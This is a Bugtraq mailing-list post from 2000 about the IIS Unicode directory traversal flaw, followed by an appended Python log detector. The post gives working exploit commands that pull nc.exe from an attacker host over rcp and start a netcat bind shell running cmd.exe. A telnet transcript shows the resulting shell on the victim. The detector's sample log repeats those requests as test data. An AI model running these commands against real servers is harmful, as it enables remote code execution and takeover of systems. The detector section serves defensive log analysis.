Bugtraq mailing list archives

IIS Unicode


From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Wed, 25 Oct 2000 02:54:58 +0200

Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on SecurityFocus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools onto the victim, you would probably want to have the
victim FTP to the attacker. The problem without a redirect is that you cannot
build the FTP command file, and you are a bit stuck.

A workaround (example) (with an rsh daemon running on the attacker's host and the
necessary config in .rhosts):

perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe'
perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe'
telnet 160.124.19.101 8888
Trying 160.124.19.101...
Connected to clickfeed.
Escape character is '^]'.
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>

Of course you need to allow port 514 in to the inside of your net, etc.

;)
Have fun,
Roelof.

PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com
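Added here as a defender's example, not part of Roelof's post: a small Python detector that scans IIS W3C extended log lines (assumed field order date, time, c-ip, method, uri-stem, uri-query, status) for the footprint the workaround above leaves in the web log, namely cmd.exe reached through /scripts/ with rcp or nc.exe in the query. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the workaround above: cmd.exe reached via the scripts
# directory, rcp pulling nc.exe onto the host, nc.exe listening with -e cmd.exe.
INDICATORS = {
    "cmd-shell":     re.compile(r"cmd\.exe", re.I),
    "netcat-binary": re.compile(r"\bnc\.exe", re.I),
    "rcp-transfer":  re.compile(r"\brcp\b", re.I),
    "bind-shell":    re.compile(r"-l\s+-p\s+\d+.*-e\s+cmd\.exe", re.I),
    "traversal":     re.compile(r"\.\.[\\/]"),
}

def parse_w3c(line):
    """Minimal W3C extended log parser; assumed field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 7:
        return None
    return {"ip": fields[2], "stem": fields[4],
            "query": "" if fields[5] == "-" else fields[5], "status": fields[6]}

def analyze(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    rec = parse_w3c(line)
    if rec is None:
        return None
    text = unquote_plus(rec["stem"]) + " " + unquote_plus(rec["query"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if not hits:
        return None
    # A shell reached through an executable directory is the worst case here.
    high = "cmd-shell" in hits and rec["stem"].lower().startswith("/scripts/")
    return {"ip": rec["ip"], "severity": "high" if high else "medium",
            "hits": hits, "request": text.strip()}

def flag_lines(lines):
    return [r for r in map(analyze, lines) if r]

# Constructed sample log; the traversal is written as a plain '..' placeholder.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-25 00:51:12 192.0.2.10 GET /scripts/../../winnt/system32/cmd.exe /c+rcp+-b+192.0.2.10.user:/tmp/nc.exe+nc.exe 200
2000-10-25 00:51:40 192.0.2.10 GET /scripts/../../winnt/system32/cmd.exe /c+c:\\inetpub\\scripts\\nc.exe+-l+-p+8888+-e+cmd.exe 200
2000-10-25 00:52:03 192.0.2.20 GET /scripts/search.asp q=unicode 200
2000-10-25 00:52:09 192.0.2.20 GET /default.htm - 200
"""

for finding in flag_lines(SAMPLE_LOG.splitlines()):
    print(finding["severity"], finding["ip"], ",".join(finding["hits"]))
```

Real IIS logs may use a different field order; adjust parse_w3c to the #Fields header of the log you actually have.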